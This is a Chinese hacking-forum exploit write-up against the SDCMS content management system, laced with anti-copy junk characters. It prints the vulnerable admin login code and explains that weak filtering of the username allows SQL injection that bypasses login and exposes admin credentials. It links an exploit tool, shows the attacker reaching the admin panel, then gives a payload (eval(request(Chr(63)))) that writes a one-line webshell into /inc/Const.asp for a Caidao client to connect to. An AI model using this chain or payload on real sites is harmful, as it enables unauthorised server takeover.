作者:T00LS 鬼哥
. z: p+ V3 S: Y漏洞文件:后台目录/index.asp2 y6 V4 z2 I7 g' q* m( j9 }
6 g K4 y5 X9 b, \% KSub Check7 E* E9 E8 w1 K3 O# L& s9 I- e4 V
Dim username,password,code,getcode,Rs
7 W7 {* q/ a0 M8 [1 F! w# ?, | IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
! P9 ^/ @/ G# o$ U9 L/ g username=FilterText(Trim(Request.Form("username")),1)
2 M7 H6 k8 l2 y+ O9 C password=FilterText(Trim(Request.Form("password")),1)) Y- p7 J& S- v+ P
code=Trim(Request.Form("yzm"))
, Y2 N% e6 u- h+ t+ _+ S getcode=Session("SDCMSCode")# l4 w5 ]" h+ h! n: _/ D
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
3 T# R) ^, Z9 [ IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied9 V1 Y; y+ r# w' ]1 ]* p2 _
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied
2 ?6 S: f7 K$ ^1 Y; e% X$ i IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied$ v# o$ Q n$ e! h4 ?! ~
IF username="" or password="" Then6 Q0 g( X! | U, w$ p0 c3 U; ]
Echo "用户名或密码不能为空" ied+ s7 \, D9 o0 \9 O& w
Else6 m' m' n& x2 k' R
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")/ s3 B" f+ X' g" O P8 x! P
IF Rs.Eof Then/ s! a, `6 E. y8 u
AddLog username,GetIp,"登录失败",1, w+ x: b C5 {: J* h/ }
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"( k8 ]* }0 x# Z/ P1 B7 D c
Else
; ~: {, R# C0 C' O. X1 o' Y# C7 B Add_Cookies "sdcms_id",Rs(0)
2 v; D" Q9 o0 j% P7 j Add_Cookies "sdcms_name",username# \1 J$ l' ?7 w& k; j i6 }
Add_Cookies "sdcms_pwd",Rs(2)
+ x! _% Y2 ~$ N+ x Add_Cookies "sdcms_admin",Rs(3)) a+ a4 T4 b* x: c) T# ^' _
Add_Cookies "sdcms_alllever",Rs(4)8 |/ W" L$ G2 w- k* n) s
Add_Cookies "sdcms_infolever",Rs(5)
% z! E& b# _$ k. X Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")" n8 d* M! [. }' E" k c
AddLog username,GetIp,"登录成功",1' X. x0 C1 o/ t4 q1 F2 S6 @6 J- ~- ?
'自动删除30天前的Log记录
" j0 D5 X& y8 S2 o k+ e IF Sdcms_DataType Then
2 M1 S; G: O: ` Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
+ |8 N1 P: K% H* O4 T# v Else i, ]9 `8 `; r/ `" f( v3 ~
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")9 R! D. P. Z2 C3 u1 U6 z4 N" |" g
End IF
2 F; E) V0 E. K: m3 J z# E4 }5 J Go("sdcms_index.asp")
! D. u/ W; }- v% v$ _" ^ End IF
1 Z a* b2 t( a" l7 Q& c% z' Q/ P( Z Rs.Close) v! v+ b5 W0 z
Set Rs=Nothing
0 ]1 J/ z- n, I) `2 X2 y7 Z# r# l End IF% `; Q, m% I6 N( g3 z1 c
End Sub x: o8 w* g* ?# c% u7 }" r9 K
% u' H1 W5 w) z2 r, ?: G’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码- C7 g4 C1 I+ |. j! D
& E4 D$ V. `+ {( K- C" X y! h
Function FilterText(ByVal t0,ByVal t1)
2 R* n/ b, I f( ?! B9 C. Z+ B IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function- F" s: Y7 @/ e& T/ T X
t0=Trim(t0)
" v8 p/ z$ P. H/ |6 Z7 v7 L" i Select Case t1& h8 }, [3 T6 x/ d
Case "1"/ ~5 Q# w- E. V9 Q# P9 [
t0=Replace(t0,Chr(32),"")
0 L4 ?: [2 ^1 H m L t0=Replace(t0,Chr(13),"")6 Y& L2 j/ L6 B
t0=Replace(t0,Chr(10)&Chr(10),"")$ p3 l( F8 M3 H# F- r% x
t0=Replace(t0,Chr(10),"")
& l) c F3 x3 _# D9 Y Case "2"
8 U( T u! z. A* Y, z. Z t0=Replace(t0,Chr(8),"")'回格: g/ n. k- Y- h, I5 S9 k
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
' W: h, U3 L! ~) k E: g t0=Replace(t0,Chr(10),"")'换行( D+ u3 [! u( ~9 y f, d
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
~; V2 v+ B1 M; l0 g. D4 K+ z( @ t0=Replace(t0,Chr(12),"")'换页
" j8 x! _3 l' D$ J; o& g t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
2 F i( c. f2 [' r# c' }7 C8 B t0=Replace(t0,Chr(22),"")* M/ U, }7 f6 O& y g
t0=Replace(t0,Chr(32),"")'空格 SPACE
& Y, z ?8 l" q t0=Replace(t0,Chr(33),"")'!" G2 ^# q/ r/ w1 P2 k& x& Z& E
t0=Replace(t0,Chr(34),"")'"5 l. n" a, o% Q7 f
t0=Replace(t0,Chr(35),"")'#' m; A' Y# K- t4 h* Q) w
t0=Replace(t0,Chr(36),"")'$
3 j3 v+ ^: c( m% v6 {5 s t0=Replace(t0,Chr(37),"")'%
. z- G( R0 r5 Z& C- p/ N5 T t0=Replace(t0,Chr(38),"")'&
) i( c+ O' O! f" ]' F& ]2 E% I t0=Replace(t0,Chr(39),"")''
8 S p3 F. @/ R) ^$ c- F: p t0=Replace(t0,Chr(40),"")'(6 J! b( s, Z+ Y9 h% b5 m$ P
t0=Replace(t0,Chr(41),"")')) D* ?! b3 s7 e1 D: S& m
t0=Replace(t0,Chr(42),"")'*
. v- P8 r e# ^ t0=Replace(t0,Chr(43),"")'+
' K# L* F5 E' z6 Q: g5 M; l t0=Replace(t0,Chr(44),"")',
! O7 x5 }2 u! |# g t0=Replace(t0,Chr(45),"")'-' ]4 k& a3 }& ^% u
t0=Replace(t0,Chr(46),"")'.$ t4 L) d$ ?* X2 M
t0=Replace(t0,Chr(47),"")'/7 v; k" p5 O) p+ V! @( E5 S- k
t0=Replace(t0,Chr(58),"")':
# E% J) n( q( S. p( q/ ?$ g) s( _ t0=Replace(t0,Chr(59),"")';
! B( g- }4 v' r0 ]4 H ~ t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
# ]1 ~1 j D' W' Z# Q t0=Replace(t0,Chr(63),"")'?
% z/ J( d2 ]% Z/ I; j1 \( ] t0=Replace(t0,Chr(64),"")'@
! J G; M) I2 y! m; [ m t0=Replace(t0,Chr(91),"")'\5 s; q5 S* y* _3 R
t0=Replace(t0,Chr(92),"")'\; U2 P3 C+ a5 O: S J# R
t0=Replace(t0,Chr(93),"")'], U4 U; W B! I! s
t0=Replace(t0,Chr(94),"")'^3 {. f# j$ H7 i5 ]
t0=Replace(t0,Chr(95),"")'_& N, |% J/ k2 t! q
t0=Replace(t0,Chr(96),"")'`# v) F$ J9 P3 k
t0=Replace(t0,Chr(123),"")'{+ o/ ]: x# F" \/ P8 O+ p" R) w
t0=Replace(t0,Chr(124),"")'|
& G$ I0 Q) Q2 y' _ t0=Replace(t0,Chr(125),"")'}
; L2 @( d" Z. h7 _0 F t0=Replace(t0,Chr(126),"")'~: o. O! ?7 E* E& E
Case Else# Q' D6 d _- I" V# S
t0=Replace(t0, "&", "&")
. J0 _+ m0 ]" [1 F3 v- }. F t0=Replace(t0, "'", "'")* m4 f# I9 t. ^5 K) V# U
t0=Replace(t0, """", """)0 p; j- K9 b7 s- y) M
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
! h8 k. o8 L! w) m End Select
$ d! x1 P' v( Z& g; I5 w IF Instr(Lcase(t0),"expression")>0 Then
9 B1 M2 E- Y) K! P: h0 d t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
, ]5 Z2 s! O- J: j' M/ I# _ End If
8 c+ W$ P5 t/ m* w1 N6 e5 C% k# ? FilterText=t0
, o6 O! M, k" L8 BEnd Function
7 t! `* R8 G% W! ^9 A
3 f. }0 e# c, l( `' u看到没。直接参数是1 只过滤
2 ~/ X' I/ |9 c4 N/ o, A& } t0=Replace(t0,Chr(32)," ")
. J# P0 V, Z; t# ~' M0 n t0=Replace(t0,Chr(13),"")
7 F- W' Q3 A( n# Q0 p4 ` t0=Replace(t0,Chr(10)&Chr(10),"
7 d; ^1 _' i& H: K9 U& _")6 @" o" J. O" f! ~( k3 N B
t0=Replace(t0,Chr(10),"
5 f5 y9 N! M7 [+ g4 L0 R! s# j")" Q& _+ D2 K: j# L j' _% t
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!7 ^! H: p( t# ^' I5 U$ T, |
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
8 D1 I# a+ K d, W1 N% G
. |' {/ L3 S! u" S: \测试:( W) }8 a" r7 k! P) B! |; `
5 b, |4 j6 \: H( C+ b" ^' {( I
* v! t" s$ Y5 t* ^现在输入工具上验证码,然后点OK
. w& N& Q% f8 W ]: s2 T2 T& G. x, U* ]! A2 s7 t `
) A `' \* H2 `6 U2 y1 H( W看到我们直接进入后台管理界面了,呵呵!0 Z8 L0 R( J! \6 m/ V8 S% z, f v
! F9 {: V& I0 g3 d6 I: J
. f: d F7 O# N& |) w
& S3 g2 v4 ?8 I- @
这样直接进入后台了。。。。* Z7 S; S+ e6 r W5 S4 q+ r4 U
5 _) Z6 h1 f' @2 e/ `
4 V4 D2 ]0 l% T1 U; Q$ t! v x
& Q: r9 G9 p2 F! U W9 m
SDCMS提权:
* y9 P2 C" ?$ N; l! s$ |; b) \. m2 }" ?$ y" U+ X4 I X9 I) r) P2 i
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?( i' q& c2 W1 _
4 H) I: R7 v/ |" n
! q) }6 i* |2 W1 ^& g, K9 h N" U, m' W0 C
OK,现在用菜刀连接下!7 @' j' n6 a* _' i& {
* `$ x9 {6 a" }; `
9 t8 V; ~/ h0 z- R" H' i( ~. j. }; L% V: {1 I* }* {
6 W% ^" h( e* p+ Y8 p, B: D' f# Q! T
{- E; K5 d% `- }+ P" L |